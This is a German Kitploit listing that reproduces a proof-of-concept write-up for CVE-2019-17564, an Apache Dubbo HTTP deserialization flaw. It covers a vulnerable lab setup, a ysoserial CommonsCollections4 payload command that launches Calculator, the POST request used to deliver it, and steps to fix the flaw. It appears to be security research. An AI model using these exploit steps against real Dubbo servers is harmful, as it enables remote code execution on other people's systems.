Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-17564 — CVE-2019-17564:Apache Dubbo Deserialisierungssicherheitslücke | Kitploit
Tools/GitHubGitHub/fairyming/cve-2019-17564
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationRemote-Access-ToolPayload-Entwicklung
GitHubfairyming/cve-2019-17564

CVE-2019-17564

CVE-2019-17564:Apache Dubbo Deserialisierungssicherheitslücke

Repository anzeigen
851vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-17564: Apache Dubbo Deserialisierungssicherheitslücke

0x00 Einleitung

Apache Dubbo ist ein leistungsstarkes, leichtgewichtiges Open-Source-Java-RPC-Framework, das drei Kernfunktionen bietet: auf Schnittstellen ausgerichtete entfernte Methodenaufrufe, intelligente Fehlertoleranz und Lastausgleich sowie automatische Service-Registrierung und -Erkennung.

0x01 Schwachstellenübersicht

Apache Dubbo unterstützt mehrere Protokolle, offiziell wird das Dubbo-Protokoll empfohlen. Eine Deserialisierungssicherheitslücke (CVE-2019-17564) im HTTP-Protokoll von Apache Dubbo wird hauptsächlich dadurch verursacht, dass Apache Dubbo nach der Aktivierung des HTTP-Protokolls den Nachrichteninhalt unsachgemäß verarbeitet, was zu unsicherer Deserialisierung führt. Wenn im Projektpaket nutzbare Gadgets vorhanden sind, kann dies zu Remote-Code-Ausführung führen.

0x02 Betroffene Versionen

2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x

0x03 Aufbau der Umgebung

  1. Da der Start von Dubbo von ZooKeeper abhängt, installieren Sie zuerst ZooKeeper
root@kitploit:~
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# 将conf目录下的zoo_sample.cfg改名为zoo.cfg
mv zoo_sample.cfg zoo.cfg
# 进入bin目录启动zookeeper
./zkServer.sh start

WX20200222-171524@2x.png

  1. Holen Sie das Dubbo-Projekt von GitHub und bearbeiten Sie die pom.xml
root@kitploit:~
git clone https://github.com/apache/dubbo-samples
# 进入到dubbo-samples-http目录中,修改pom.xml
vim pom.xml

Ändern Sie die Dubbo-Version auf eine anfällige Version WX20200222-172028@2x.png Fügen Sie eine Abhängigkeit hinzu, um ein nutzbares Gadget zu importieren; hier wird commons-collections4-4.0 importiert

root@kitploit:~
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>

WX20200222-172346@2x.png

  1. Maven-Build, Start von Dubbo
root@kitploit:~
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

WX20200222-172721@2x.png

0x04 Schwachstellenausnutzung

payload

root@kitploit:~
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod

Hier wird ysoserial verwendet, um das Payload zu generieren

root@kitploit:~
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser

Senden des Pakets mit Burp Suite WX20200222-173202@2x.png

0x05 Behebung

  1. HTTP-Protokoll deaktivieren
  2. Rechtzeitig auf Version 2.7.5 oder höher aktualisieren. Verwandter Link: https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5

Referenzlinks:

https://www.mail-archive.com/[email protected]/msg06225.html

Tool herunterladen